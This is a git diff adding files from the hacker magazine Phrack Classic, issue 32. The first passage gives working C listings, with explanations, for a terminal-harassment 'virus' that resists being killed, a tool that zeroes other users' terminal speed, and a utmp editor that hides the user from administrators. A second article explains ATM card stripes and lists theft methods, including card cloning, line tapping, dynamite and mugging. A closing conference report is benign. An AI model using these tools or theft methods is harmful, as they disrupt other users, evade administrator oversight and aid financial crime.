+        Ok, the above two lines essentially parse the command line.
+        The MBS program only accepts ONE argument, which is the priority
+        value to add to the normal process priority.  This is so you
+        can customize how fast MBS runs.  If you want to burn CPU time,
+        you would invoke mbs by:
+        $ mbs 0
+
+        That would make the priority as fast as the current can run something.
+        MBS's default priority setting is 20, so that CPU time will be saved.
+        MBS is very fast however, and since alot of Unix systems like to
+        cache alot of frequently used data from disks, it gets fast after
+        it reads utmp a few times, since utmp will be cached until it changes.
+        However, you can run MBS with a number from 0-19, the higher the
+        number, the "less" priority it will have with the cpu.
+
+
+___
+
+if ((pid = fork()) > 0) {
+  printf("Welcome to MBS 2.2 Deluxe, By Sir Hackalot [PHAZE]\n");
+  printf("Another Fine PhaZeSOFT production\n");
+  sprintf(kstr,"Created Process %s (%d)\n\n",argv[0],pid);
+  kmes(kstr,1);
+  exit(0); /* KILL MOTHER PID, return to Shell & go background */
+}
+
+___
+
+        The above is what sends MBS into the background.  It calls fork(),
+        which creates another process off the old one.  However, fork()
+        can be considered "cloning" a process, since it will use anything
+        beneath it.  So, now you can assume there are TWO copies of MBS
+        running -- One in the foreground, and one in the background.  However,
+        you may notice the exit(0).  That first exit kills off the parent.
+        a second call to exit() would kill the child as well.  notice the
+        call to "kmes".  kmes is just a function that is defined earlier,
+        which I will discuss later.
+___
+
+nice(prio);
+signal(SIGQUIT,sig_hand);
+signal(SIGINT,sig_hand);
+signal(SIGTERM,sig_hand);
+/*   signal(SIGHUP,SIG_IGN); */
+___
+
+        The above code is integral for the survival of the MBS program in
+        memory.  The nice(prio) is what sets the new priority determined
+        by the command line parsing.
+
+        The signal() statements are basically what keeps MBS running.  What
+        it does is catch INTERRUPTS, Quits, and a regular call to KILL.
+        the commented out portion would ignore requests to kill upon hangup.
+        This would keep MBS in the background after you logged off.
+
+        Why do this?  Well, remember that the parent was affected by
+        its environment?  Well, the new forked process is too.  That means,
+        if you were 'cat'ting a file, and hit control-C to stop it, the
+        cat process would stop, but push the signal on to MBS, which would
+        cause MBS to exit, if it did not have a signal handler.  The signal
+        calls setup signal handlers.  What they do is tell the program
+        to goto the function sig_hand() when one of the 3 signals is
+        encountered.  The commented signal just tells the program to ignore
+        the hangup signal.  The sig_hand argument can be replaced with
+        SIG_IGN if you just want to plain ignore the signal and not handle it.
+
+        The SIGQUIT is sometimes the control-D character.  That is why it
+        also must be dealt with.  If the signals aren't ignored or caught,
+        MBS can easily kicked out of memory by YOU, by accident of course.
+
+___
+
+while(1) {  /* "Kernel" Begins here and never ends */
+     handle = open("/etc/utmp",O_RDONLY);
+___
+
+        The above starts the main loop.  The begining of the loop is to open
+        the utmp file.
+
+___
+
+ while (read(handle,&u,sizeof(u)) != 0) {
+      bad = 0;
+      sprintf(full_tty,"/dev/%s",u.ut_line);
+      if (strcmp(u.ut_name,getlogin()) != 0) {
+        if (u.ut_type == USER_PROCESS) isg = checkent(u.ut_name);
+           else isg = 1;
+        if (isg != 1) {
+           if((to_tty = fopen(full_tty,"w")) == NULL)  {
+              bad = 1;
+              }
+           if (bad == 0) {
+              fprintf (to_tty, "\b\b\b");
+              fflush (to_tty);
+              }
+              fclose(to_tty);
+        }
+    }
+___
+
+
+        Above is the sub_main loop.  what it does is go through the utmp
+        file, and on each entry, it prepares a path name to the TTY
+        of the current utmp entry (sprintf(fulltty...)).  Then it checks
+        to see if it is YOU.  If it is, the loop ends.  If it is not, then
+        it sees if it is a User.   If not, it ends the loop and goes to
+        the next.
+
+        If it is a user, it goes to checkent to see if that user has been
+        declared immune in the immunity tables (down below later..).
+        If the idiot is not immune, it attempts to open their tty.  If it
+        cannot, it sets the bad flag, then ends the loop.  If it can be
+        written to, it sends three backspaces, according to YOUR tty specs.
+        Then, it closes the opened tty, and the loop continues until the end.
+
+___
+
+       }
+close (handle);
+    }
+}
+
+___
+
+        The above is the end of the main loop.  It closes handle (utmp) so
+        it can be reopened at the start of the loop at the beginning of the
+        file.  The reason to not create a table of people to hit in memory
+        after one reading is so that MBS will stop after people logoff, and
+        to start when new ones logon.  The constant reading of the utmp
+        file makes sure everyone gets hit, except immune people.  Also,
+        the file must be closed before reopening, or else, after a few opens,
+        things will go to hell.
+
+
+Here is the signal handler:
+
+___
+
+void sig_hand(sig)
+int sig;
+{
+if(sig == 3) kmes("Ignoring Interrupt\n",1);
+if(sig == 15) kmes("Ignoring Termination Signal\n",1);
+if(sig == 4) kmes("Ignoring quit signal.\n",1);
+        }
+___
+
+        It is very simple.  when a signal is caught and sent to the handler,
+        the library function SIGNAL sends the signal number as an argument
+        to the function.  The ones handled here are 3,4, and 15.  But
+        this was just for effect.  You could just have it print one line
+        no matter what the signal was, or just rip this function out and
+        put in SIG_IGN in the signal calls.
+
+        Below is the immunity check:
+___
+
+int checkent(uname) /* Check for immunity */
+char *uname;
+{
+        int cnt = 0;
+        truefalse = 0; /* assume NOT immune */
+        while (cnt < maxitem) {
+                if (strcmp(uname,ent[cnt]) == 0) { /* if immune... */
+                        truefalse = 1;
+                        warn[cnt]++; /* increment warning variable */
+                        warnem(cnt); /* warn him if we have not */
+                }
+
+                cnt++;
+        }
+        return(truefalse); /* return immunity stat. 1=immune, 0 = not */
+}
+
+___
+
+        Above, you see variables used that are not defined.  They are
+        just variables that were declared as globals at the begining.
+        What this does is just compare the login name sent to it with
+        every name in the immunity table.  If it finds the name on
+        the table matches, it will go and see if it should warn the
+        user.  Also, the warn count is incremented so that the warning
+        function will know if the user has been warned.
+
+        Here is the warning function:
+
+___
+
+void warnem(wcnt) /* Notify all the immune people ... */
+int wcnt;
+{
+        if (bad == 0) { /* keep from dumping core to disk */
+                if (warn[wcnt] < 2) {
+                        sprintf(kstr,"%s has started a backspace virus!\n",getlo
+                        kmes(kstr,0);
+                        warn[wcnt]++;
+                }
+        }
+}
+___
+
+        What this does is take the position number of the table entry and
+        checks and see if that entry has been warned before.  It decides
+        this by checking its value.  If it is less than two, that means
+        the user had not been warned.  After it is sent, the function
+        incrememnts the warning flag so that they will never been warned
+        again until the program has stopped & restarted or someone else
+        runs one.  The "if (bad == 0)" is there so that it only warns a
+        person if it can write to the tty.
+
+        Here is the kmes function you keep seeing:
+
+___
+
+void kmes(fmt,boo)
+char *fmt;
+int boo;
+{
+        if (boo != 0) {
+                printf("MBS_KERN: ");
+                printf("%s",fmt);
+        }
+        if (boo == 0) {
+                sprintf(full_tty,"/dev/%s",u.ut_line);
+                to_tty = fopen(full_tty,"w");
+                fprintf(to_tty,"MBS_KERN: %s",fmt);
+                fclose(to_tty);
+        }
+}
+___
+        All this is, is a fancy printf which prints a string with
+        "MBS_KERN:" stuck on the front of it.  the BOO variable is just
+        so it can determine whether or not to send it to the local
+        screen or to another tty.  It is just for looks.
+
+        Now, finally, we can look at the initializer:
+
+___
+
+void initit() {  /* Initialize our little "kernel" */
+        int xxx = 0;
+        strcpy(ent[0],"sirh");
+        strcpy(ent[1],"merlin");
+        strcpy(ent[2],"datawiz");
+        strcpy(ent[3],"par");
+        strcpy(ent[4],"epsilon");
+        while (xxx < 11) {
+                warn[xxx] = 0;
+                xxx++;
+        }
+        kmes("Kernel Started.\n",1);
+}
+___
+
+        This is a very SIMPLE procedure.  It just fills the list
+        with the people to keep immune.  ent[..][..] is what holds
+        the immune list.  It also zeros out the warning flags associated
+        with each user.  ("sirh","merlin","par",etc. are acct. names)
+
+        This "virus" can do more than just send backspaces if you want it
+        to, but it will take modification.  Some people have modified
+        it to include the next program, which is ioctl.c.
+
+_______________________________________________________________________________
+
+
+
+o IOCTL -- Set another's tty w/out read perms
+  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+        The program ioctl is very very nice.  What it does is basically
+        act like stty, but you don't have to use the < to change
+        someone else's terminal.  Here is the listing:
+
+- - - - - - - - - - - - - - - - - -CUT-HERE- - - - - - - - - - - - - - - - - -
+
+#include <stdio.h>
+#include <sys/types.h>
+#include <fcntl.h>
+#include <sgtty.h>
+#define TIOC ('T'<<8)
+#define TCSETA (TIOC|2)
+
+main(argc,argv)
+int argc;
+char *argv[];
+{
+        int x;
+        struct sgttyb histty;
+        if (argc == 1) exit(0);
+        x = open(argv[1],O_WRONLY);
+        if (x == -1) exit(0);
+        histty.sg_ispeed = B0;
+        histty.sg_ospeed = B0;
+        ioctl(x,TCSETA,&histty);
+}
+
+- - - - - - - - - - - - - - - - - -CUT-HERE- - - - - - - - - - - - - - - - - -
+
+        The basis of the program is that you give a full path to the tty
+        to nail.  You need to be able to write to the tty for it to work.
+
+        Notice the two defines.  They are in there so you do not have
+        to include termio.h, and hence get 200 warnings of redefinition.
+        This program is WAY simpler than MBS, but here is how it works:
+
+___
+
+main(argc,argv)
+int argc;
+char *argv[];
+___
+
+        Of course, the above sets up the program to get command line
+        arguments.
+
+___
+
+        int x;
+        struct sgttyb histty;
+___
+
+        These are the variables.  the sgttyb structure is what the ioctl
+        function call needs to do its duty.  You can do a lot to a tty
+        using the structure, but this program only does 2 things to the
+        tty, as you shall soon see.  Remember that the programs here can
+        be modified, especially this one.  Just check out sgtty.h to
+        see the modes you can pop a tty into.
+
+___
+
+        if (argc == 1) exit(0);
+        x = open(argv[1],O_WRONLY);
+        if (x == -1) exit(0);
+___
+
+        The above three lines are the open/error checks.  The 1st line
+        says that if the idiot did not give an argument then exit
+        the program.  The argument needs to be the path to the
+        device driver (/dev/tty...).
+        The second line opens the tty for writing, and the third exits
+        upon error.
+
+___
+
+        histty.sg_ispeed = B0;
+        histty.sg_ospeed = B0;
+        ioctl(x,TCSETA,&histty);
+___
+
+        The above three lines are the meat of the program.  What they
+        do is this:
+
+        Line 1 sets the input speed to 0 for the tty into the structure.
+        line 2 sets the output speed to 0 for the tty into the structure.
+        line 3 sets the tty according to the structure histty.
+
+        That is why if you look into the components of the structure, you can
+        do things, such as convert all output to uppercase for them,
+        set a higher baud, redefine CR mapping, redefine tabs, and
+        all sorts of things.
+
+_______________________________________________________________________________
+
+
+o MME - Make ME!:
+  ~~~~~~~~~~~~~~~
+        MME is just a program which changes utmp for you, in order to hide
+        you, or just mess with other user's minds.  This is a different
+        version then the one I originally put out.  In this version,
+        I removed the code that lets you change your tty.  It just became
+        too dangerous to change your tty.
+
+        Here is the listing:
+
+- - - - - - - - - - - - - - - - - -CUT-HERE- - - - - - - - - - - - - - - - - -
+
+#include <stdio.h>
+#include <fcntl.h>
+#include <sys/types.h>
+#include <utmp.h>
+#include <sys/stat.h>
+
+char *mytty; /* For an exact match of ut_line */
+char *backup_utmp = "cp /etc/utmp /tmp/utmp.bak";
+struct utmp *user;
+
+main(argc,argv)
+int argc;
+char *argv[];
+{
+        int good= 0,cnt = 0,start = 1, index = 0;
+        char err[80];
+        system(backup_utmp);
+    printf("Welcome to MME 1.00 By Sir Hackalot\n");
+    printf("Another PHAZESOFT Production\n");
+    printf("Status:");
+    if (argc == 2) printf("Changing your login to %s\n",argv[1]);
+        if (argc == 1) printf("Removing you from utmp\n");
+
+        utmpname("/etc/utmp");
+        mytty = strrchr(ttyname(0),'/'); /* Goto the last "/" */
+        strcpy(mytty,++mytty); /* Make a string starting one pos greater */
+        while (good != 1) {
+                user = getutent();
+                cnt++;
+                if (strcmp(user->ut_line,mytty) == 0) good =1;
+        }
+        utmpname("/etc/utmp"); /* Reset file pointer */
+        for(start = 0;start < cnt;start++) {
+                user = getutent(); /* Move the file pointer to where we are */
+        }
+
+
+    if (argc == 1) {
+     user->ut_type = LOGIN_PROCESS;
+         strcpy(user->ut_name,"LOGIN");
+                   }
+    else user->ut_type = USER_PROCESS;
+
+        if (argc == 2) strcpy(user->ut_name,argv[1]);
+        pututline(user); /* Rewrite our new info */
+        endutent(); /* Tell the utmp functions we are through */
+        printf("Delete /tmp/utmp.bak if all is well.\n");
+        printf("Else, copy it to /etc/utmp.\n");
+}
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+
+        Well, of course, we will take this bit by bit.
+        Lets start with the standard ole function:
+
+___
+
+main(argc,argv)
+int argc;
+char *argv[];
+___
+
+        This again sets up main so we can accept command line arguments.
+
+___
+
+char *mytty; /* For an exact match of ut_line */
+char *backup_utmp = "cp /etc/utmp /tmp/utmp.bak";
+struct utmp *user;
+___
+
+        These are just global variables.
+        Backup_utmp is the command we will issue to shell for a failsafe
+        mechanism.
+
+___
+
+           system(backup_utmp);
+    printf("Welcome to MME 1.00 By Sir Hackalot\n");
+    printf("Another PHAZESOFT Production\n");
+    printf("Status:");
+    if (argc >= 2) printf("Changing your login to %s\n",argv[1]);
+        if (argc == 1) printf("Removing you from utmp\n");
+___
+
+        The above is not hard to figure out.  First, this uses the system
+        command to load shell, and execute our backup command.
+        Then, the lame credits are printed.  Then, it tells you what it
+        is going to do based on the number of arguments passed from the
+        command line.
+        If no arguments are given (argc==1) then remove us from utmp.
+        If there are 1 or more (arc>=2) then change the login name.
+
+___
+
+utmpname("/etc/utmp");
+        mytty = strrchr(ttyname(0),'/'); /* Goto the last "/" */
+        strcpy(mytty,++mytty); /* Make a string starting one pos greater */
+___
+
+        The above code does the following:  utmpname is a system function
+        common to UNIX system V, XENIX system V, etc.  It is part of the
+        utmp reading library.  It sets the thing to be read when the
+        other system calls are made (getutent, etc..).
+        mytty is set to hold one's tty.  It has to break down the result
+        of ttyname(0) to get a ttyname without a path.
+
+___
+
+while (good != 1) {
+                user = getutent();
+                cnt++;
+                if (strcmp(user->ut_line,mytty) == 0) good =1;
+        }
+___
+
+
+        This code gets your relative index from utmp and stores it into
+        cnt.
+
+___
+
+utmpname("/etc/utmp"); /* Reset file pointer */
+        for(start = 0;start < cnt;start++) {
+                user = getutent(); /* Move the file pointer to where we are */
+        }
+___
+
+        The above resets the file pointer used by the system calls, then
+        moves to your entry.
+
+___
+
+if (argc == 1) {
+     user->ut_type = LOGIN_PROCESS;
+         strcpy(user->ut_name,"LOGIN");
+                   }
+    else user->ut_type = USER_PROCESS;
+
+        if (argc == 2) strcpy(user->ut_name,argv[1]);
+        pututline(user); /* Rewrite our new info */
+        endutent(); /* Tell the utmp functions we are through */
+___
+
+        The above is very simple as well.  If you are removing yourself
+        from utmp, it will change your process type to LOGIN_PROCESS
+        so that when someone does a "who", you are not there.
+        It changes your login name to LOGIN so if some knowitall
+        system admin does a who -l, he wont see you.  See, who -l shows
+        ttys waiting for login.  SO, if i did not change your tty name,
+        we would see:
+
+        $ who -l
+        LOGIN           ttyxx1
+        LOGIN           tty002
+        joehack         tty003
+        LOGIN           tty004
+
+        See the problem there?  That is why your name needs to be
+        changed to LOGIN.
+        If you are changing your login name, the "else" statment kicks
+        in and makes SURE you WILL show up in utmp, in case you had
+        removed yourself before.
+        Then, it takes the command line argument, and places it as your
+        login name in utmp.
+        pututline(user) then writes the info into the record where the
+        file pointer is... and that is your record.  It puts the contents
+        of the things in the "user" structure into the file.  then, endutent
+        closes the file.
+
+        Now, here is an example of using the file:
+
+        # mme Gh0d
+
+        that would change your login name to Gh0d in utmp.
+
+        # mme
+
+        that would remove you from sight.  Remember!!: You need write perms
+        to utmp for this to work.  You CAN test this program by changing
+        the filename in the function "utmpname" to somewhere else, say in
+        /tmp.  You could copy /etc/utmp to /tmp/utmp, and test it there.
+        Then, you could use "who" to read the file in /tmp to show the
+        results.
+
+_______________________________________________________________________________
+
+
+o In Conclusion:
+  ~~~~~~~~~~~~~~
+
+        These are just some of the programs I decided to put in this file.
+        I have a lot more, but I decided I would keep them for later
+        issues, and leave these two together since they can
+        be easily related.  One person took MBS, and ioctl, and mended
+        them together to make a program that sets everyone's baud
+        rate to zero instead of sending 3 backspaces.  They just put
+        in the above lines of code into the place where they sent
+        the backspaces, and used open instead of stream open (fopen).
+        It is very simple to mend these two things together.
+
+        Have a nice life!  Keep on programmin'!
+
+        By: Sir Hackalot of Phaze.
+_______________________________________________________________________________
diff --git a/phrack32/6.txt b/phrack32/6.txt
new file mode 100644
index 0000000..5b58645
--- /dev/null
+++ b/phrack32/6.txt
@@ -0,0 +1,307 @@
+                              ==Phrack Classic==
+
+                     Volume Three, Issue 32, File #6 of 12
+
+                     +----------------------------------+
+                     ]          Exploration of:         ]
+                     ]  Automatic Teller Machine Cards  ]
+                     ]                                  ]
+                     +----+-------------------------+---+
+                          ]       Written by:       ]
+                          ]      Jester Sluggo      ]
+                          ]                         ]
+                          ] Released: May 13, 1989  ]
+                          ](to Black-Ice:For Review)]
+                          ] Released: Jan 12, 1990  ]
+                          ]    (to Phrack Inc.)     ]
+                          ] Released: Nov, 10, 1990 ]
+                          ]   (to Phrack Classic)   ]
+                          +-------------------------+
+
+
+With the North American continent the being the worlds biggest
+consumer of goods and services liquidity of the banking system  has
+become an important factor in our everyday lives.  Savings accounts
+were used by people to keep money safe and used by the banks to
+provide money for loans.  However, due to 'Bankers Hours' (10 AM to
+3 PM) it was often difficult for people to get access to thier
+money when they needed it.
+
+The banking system then created the Checking Account system.  This
+system allowed people to have much easier access to thier money.
+Unfortunately the biggest drawback of this system is that people can
+not manage thier own money and accounting procedures.  Millions of
+times each day throughout the North American continent people are
+writing checks for more money than they have in thier savings accounts.
+This drawback also causes the already-backed up judicial system to
+become backed up further. The banking system soon reacted to this
+problem by producing 'check verification' methods to prevent people
+from forgery, and overdrawing from thier accounts.
+
+"Money makes the world go 'round" and there are many different ways
+to make this world spin.  Today we have checking accounts, credit
+cards, travelers checks, and the most 'liquid' form of money: cash.
+Cash transactions are untrackable and widely accepted, so I feel
+the "Paperless Society" will never happen.  Automated Teller Machines
+provide consumers with 24-hour access to cash-sources.  By simply
+inserting a plastic card into the machine and keypadding-in the
+owners' "account password", you can access the owners bank account
+and receive cash in-hand.  This file will explain some details of
+the automated tellers and the plastic card used by the Teller-system.
+
+The automated teller is connected by wires and cables to a "Main
+Computer".  During each transaction the teller sends signals to
+the main computer.  The main computer records each transaction
+(a deposit or withdrawl) and updates the card-holders account.
+It also sends 'approval' or 'denial' signals to the ATM in regard
+to the transaction requested.  If a card-holder attempts to withdraw
+$150.00 from his account and he has only $100.00 in it, the main
+computer will tell the ATM to deny the transaction.
+
+The ATM has 2 compartments to store cash in.  The first is the "deposits"
+compartment.  This is a small area that receives the daily deposits.
+It is located in the upper-part of the machine, near all the mechanical
+devices.  However, because most ATM transactions are withdrawls the
+complete bottom-half is filled with cash where the withdrawls are
+extracted from.
+
+The plastic card inserted into the machine is the same size as a
+credit card.  The front of the card is embossed with information
+about the card-holder.  The back-side of the card has a thin strip
+of magnetic tape which also holds some important information.
+
+   +--------------------------+     +--------------------------+
+   ] CIRRUS                   ]     ]--------------------------]
+   ]  INSTANT CASH CARD       ]     ]/////(magnetic strip)/////]
+   ]                          ]     ]--------------------------]
+   ] Acct: 12345675      Exp. ]     ]                          ]
+   ] Joe Schmoe         01/91 ]     ] "card-holders signature" ]
+   ]                          ]     ]                          ]
+   +--------------------------+     +--------------------------+
+          Front-side                          Back-side
+
+When a cardholder inserts his card into the machine and requests a
+transaction, the machine reads the embossed information from the
+front-side and compares it with the data stored on the magnetic
+strip; looking for a 'match' of the information on both sides.
+
+The information on the front-side is easily readable with your
+eyes.  However, you can not read the data on the magnetic-strip
+so easily.  You may ask , "What is stored on the magnetic strip ?".
+The answer is; the same information as the embossing plus some
+'confidential' information regarding the cardholders' financial
+status is stored there.  The magnetic strip has 3 "tracks" on it.
+The first track can store 210 BPI (Bytes per inch), and the second
+stores 75 BPI, and the third stores 210 BPI.  So, we have:
+
+                +---------------------------+
+   Track 1:         (210 BPI density)
+                +---------------------------+
+   Track 2:         ( 75 BPI density)
+                +---------------------------+
+   Track 3:         (210 BPI density)
+                +---------------------------+
+
+                     THE MAGNETIC STRIP
+
+
+Now, here's the information stored on each track of the strip in
+my example:
+
+   Track 1: " ;B 12345675 ^ Schmoe/Joe ^ ; LRC "
+   Track 2: " ;12345675 01/91 ^ 1234 ^ (discriminate data) ; LRC "
+   Track 3: " ;12345675 ^ 01/91 ^ 5 (discriminate data) ; LRC "
+
+Here's the decoding of the above information:
+Track 1:      ";" = Beginning of the data character
+              "B" = Field-Control Character: I believe this character
+                     tells the ATM what type of account (or status)
+                     the user has.
+       "12345675" = This is the account number of the cardholder.
+              "^" = Data-field seperator.
+     "Schmoe/Joe" = Last/First name of cardholder.
+              "^" = Data-field seperator.
+              ";" = End of data character.
+            "LRC" = Longitude Redundancy Check (end of track character).
+
+Track 2:      ";" = Beginning of data character
+       "12345675" = Account number of the cardholder.
+          "01/91" = Month/Year the card expires.
+              "^" = Data-field seperator.
+           "1234" = Process Identification Number (The cardholders 'password',
+                     I think... or it could be a number to verify the
+                     the transaction between the ATM and the Main Computer).
+              "^" = Data-field seperator
+ "(dscrmn. data)" = Discriminate Data. Not much is known exactly what is
+                     stored here. Perhaps Bank Identification data or
+                     bank account type (savings, checking?) ?
+              ";" = End of data character.
+            "LRC" = Longitude Redundancy Check.
+
+Track 3:      ";" = Beginning of data character.
+       "12345675" = Account number of the cardholder.
+              "^" = Data-field seperator.
+          "01/91" = Month/Year the card expires.
+              "^" = Data-field seperator.
+              "5" = The crypting-digit. When the transaction request
+                     is sent to the main computer, it is encrypted.
+                     This digit tells which encryption-key is used.
+ "(dscrmn. data)" = A duplicate of the discriminate data stored on
+                     Track 2.
+              ";" = End of data character.
+            "LRC" = Longitude Redundancy Check.
+
+When the card is being processed the ATM tries to match the
+account number, expiration date and name stored on each track.
+The reason they duplicate data is for verification purposes. But,
+notice that the duplicate data is stored on different tracks, each
+having different recording densities.  Once the information on the
+tracks are confirmed to match, the ATM compares them to the embossed
+information on the front-side.  If all of the information matches
+then the transaction will proceed.  If it doesn't match, then the card
+is considered to be damaged and the ATM will keep the card.  It will
+give the cardholder a piece of paper instructing the user to notify
+the bank who issued his ATM-card so he can receive a replacement
+card in the mail (this process takes about 3 weeks).
+
+
+Now that you know how the ATM-system is designed and what information
+is kept where on the card, what "security defects" does this system
+contain ?  I will outline 4 methods of attacking this system that
+have been tried (not by me!).
+
+  1) Vandalization:  If you want, you can break-in to the ATM.
+     However, most ATM's contain 'sensor' devices which sound an
+     alarm when this is tried.  Therefore, if you're going to try
+     this method I do not suggest using a hammer and chisel on the
+     ATM because it will take 1/2 an hour to get the machine open
+     and by that time the police will be there.  You could try a
+     much faster way, dynamite; but that might scatter the money
+     all-over, making it hard to collect.  Also, the bottom-half
+     is where most of the money is stored (unless you happen to
+     choose a machine that has issued all of its withdrawl-cash)
+     so you'll want to break into the bottom-half of the ATM.
+
+     In relation to this, you could wait outside the ATM for a
+     valid-user to complete his withdrawl-transaction and mug him.
+     As far as I know, the bank holds no responsibilty for placing
+     the ATM in a 'secure' enviroment.  However, usually they will
+     have lights nearby and placed in 'reasonable' places where
+     people need money (example: Grocery store) and where the chance
+     of mugging is slim.
+
+
+  2) Physical Penetration: There are several ways of doing this.
+     If you have a stolen card, you could randomly try guessing his
+     account-password.  But, I feel this is a primitive method.
+     If you try too many attempts at guessing the 'password',
+     the ATM will return the card to you.  But, your attempts
+     *might* be recorded in the central computer; allowing the
+     bank to decide whether to cancel that card... However,
+     this has not been verified by me.  If you do get a cash-card,
+     you can make counterfeit-cards.
+
+     A) Counterfiet ATM-cards:  The same method for producing
+        counterfiet credit cards applies to ATM-cards.  If you
+        have a valid ATM-card you can 'clone' it simply by embossing
+        a blank-card with the same information.  Copying the mag-
+        netic strip is also easy. To do this, you place a blank
+        strip of the magnetic tape on top of the valid magnetic
+        strip.  Then, using an iron on low-heat, gently rub the
+        iron across the two strips for a few seconds.  Lastly,
+        peel the new strip apart from the valid one and you've
+        got a copy of all the data from the valid ATM-card.
+
+     B) Also, I've heard a case where some guys had a machine
+        that could read and write to the magnetic strips (probably
+        they were employees of a company that produces the ATM-cards).
+        Using this machine, they were able to create and change
+        existing data on ATM-cards (such as the expiration date
+        so they could keep using the same card over a long period
+        of time).
+
+        In relation to this there are other devices available that
+        can read and write to magnetic strips.  Using your own
+        microcomputer, you can buy a device that allows you to
+        read and write to these magnetic strips. It looks
+        similar to a disk drive.  If you're interested in
+        exploring this method, I'll suggest that you contact
+        the following company:
+
+                 American Magnetics Corporation
+                 740 Watsoncenter Road
+                 Carson, California   90745
+                 USA
+
+                 213/775-8651
+                 213/834-0685  FAX
+                 910-345-6258  TWX
+
+     C) WARNING: During each transaction attempted on an ATM a
+        photo of the person requesting the transaction is taken.
+        How long this film is stored is unknown, but it probably
+        is different for each bank (unless there is a federal
+        regulation regarding this).  Also, it is possible that
+        this is not done at all ATMs.
+
+  3) "Insider" Theft: The above case also crosses over into this
+      section.  The biggest 'security leaks' in any company are
+      its employees.  This is also the easiest way to steal money
+      from ATMs.  The man who collects the deposits from the machine
+      and inserts cash for withdrawls has the easiest and most
+      open access to these machines.  I was told that this person
+      can easily steal money from ATMs and not be detected.  Another
+      person with access to these machines is the technician. The
+      technician who fixes ATMs is the most-knowledgeable person
+      about ATMs within the bank, therefore he should be a trust-
+      worthy guy and receive a 'comfortable' salary.. otherwise
+      he'll begin to collect 'retirement benefits' from the ATM
+      and this may go undetected.
+
+      However, I have heard of some embezzlement-cases involving ATMs,
+      so I think it's not as easy as it seems.  It's only common sense
+      that a bank would account for every dollar of every transaction.
+      Whether the accounting is done inside the ATM or the main
+      computer doesn't make a difference...  some form of accounting
+      is *probably* done.
+
+  4) Data-link Intercept:  This method has been very successful.  What
+     you do is 'tap' into the wires that connect the ATM to the Main
+     computer.  By doing this you can intercept and send signals to
+     the ATM.  However, some 'inside information' is needed because
+     the transmission is encrypted (refer to the Cryptography Digit
+     stored on the magnetic strip).  But, I think you don't need to
+     know *everything* being transferred.  You should need to know
+     when to send the 'approval' signal to the ATM telling it to
+     dispense its' cash.  I read a case (it may be in Phrack World
+     News; 1985?) where some guys netted $600,000 from various ATMs
+     using this method.  This seems to be one of the better, and
+     more ingenious methods of stealing from these machines.
+
+
+The information in this file should be 'adequate' to introduce you
+to how ATMs work.  How did I get this information?  I went into a
+bank and inquired about the computer-technology of ATMs.  The man
+who was responsible for the ATMs was a bureaucrat and actually knew
+very little about the 'guts' of ATMs.   Luckily the ATM-technician
+was there that day and I agreed to buy him dinner later that evening.
+(Please refer to: "Insider" Theft and the principle of Company-Loyalty).
+During the dinner at "Toppers" (a neat 1950's Burgers/Milkshake/Beer
+restaurant) he provided me with Operation and Repair manuals for the
+ATMs.  I feel this information is well-worth the $3.82 dinner and
+will be of some value to its' readers.  Some good information was
+screened-out due to its 'delicate nature', but the information I've
+provided has been confirmed.
+
+
++---------+
+] CREDITS ]
++---------+
+The Mentor (Phrack #8, File #7;  "Fun with Automatic Tellers")
+Deserted Surfer
+Hyudori
+Lex Luthor
+
+Please distribute this file in its complete form.
+
+_______________________________________________________________________________
diff --git a/phrack32/7.txt b/phrack32/7.txt
new file mode 100644
index 0000000..2572228
--- /dev/null
+++ b/phrack32/7.txt
@@ -0,0 +1,268 @@
+                              ==Phrack Classic==
+
+                     Volume Three, Issue 32, File #7 of 12
+
+
+13th Annual National Computer Security Conference
+October 1-4, 1990
+Omni Shoreham Hotel
+Washington, D.C.
+A "Knight Lightning" Perspective
+by Craig M. Neidorf
+
+Dr. Dorothy Denning first hinted at inviting me to take part on her panel
+"Hackers:  Who Are They?" in May 1990 when we first came into contact while
+preparing for my trial.  At the time I did not feel that it was a very good
+idea since no one knew what would happen to me over the next few months.  At
+the conclusion of my trial I agreed to participate and surprisingly, my
+attorney, Sheldon Zenner (of Katten, Muchin, & Zavis), accepted an invitation
+to speak as well.
+
+A few weeks later there was some dissension to the idea of having me appear at
+the conference from some professionals in the field of computer security.  They
+felt that my presence at such a conference undermined what they stood for and
+would be observed by computer "hackers" as a reward of sorts for my notoriety
+in the hacker community.  Fortunately Dr. Denning stuck to her personal values
+and did not exclude me from speaking.
+
+Unlike Gordon Meyer, I was unable to attend Dr. Denning's presentation
+"Concerning Hackers Who Break Into Computer Systems" and the ethics sessions,
+although I was informed upon my arrival of the intense interest from the
+conference participants and the reactions to my now very well known article
+announcing the "Phoenix Project."
+
+Not wishing to miss any more class than absolutely necessary, I arrived in
+Washington D.C. late in the day on Wednesday, October 4th.  By some bizarre
+coincidence I ended up on the same flight with Sheldon Zenner.
+
+I had attended similar conventions before such as the Zeta Beta Tau National
+Convention in Baltimore the previous year, but there was something different
+about this one.  I suppose considering what I have been through it was only
+natural for me to be a little uneasy when surrounded by computer security
+professionals, but oddly enough this feeling soon passed as I began to
+encounter friends both old and new.
+
+Zenner and I met up with Dorothy and Peter Denning and soon after I met Terry
+Gross, an attorney hired by the Electronic Frontier Foundation who had helped
+with my case in reference to the First Amendment issues.  Emmanuel Goldstein,
+editor of 2600 Magazine and probably the chief person responsible for spreading
+the news and concern about my indictment last Spring, and Frank Drake, editor
+of W.O.R.M. showed up.  I had met Drake once before.  Finally I ran into Gordon
+Meyer.
+
+So for a while we all exchanged stories about different events surrounding our
+lives and how things had changed over the years only to be interrupted once by
+a odd gentleman from Germany who inquired if we were members of the Chaos
+Computer Club.  At the banquet that evening, I was introduced to Peter Neumann
+(who among many other things is the moderator of the Internet Digest known as
+"RISKS") and Marc Rotenberg (Computer Professionals for Social Responsibility).
+
+Because of the great interest in the ethics sessions and comments I had heard
+from people who had attended, I felt a strange irony come into play.  I've
+hosted and attended numerous "hacker" conventions over the years, the most
+notable being "SummerCon".  At these conventions one of the main time consuming
+activities has always been to play detective and attempt to solve the mystery
+of which one of the guests or other people at the hotel were there to spy on us
+(whether they were government agents or some other form of security personnel).
+
+So where at SummerCon the youthful hackers were all racing around looking for
+the "feds," at the NCSC I wondered if the security professionals were reacting
+in an inverse capacity... Who Are The Hackers?  Despite this attitude or maybe
+because of it, I and the other panelists, wore our nametags proudly with a
+feeling of excitement surrounding us.
+
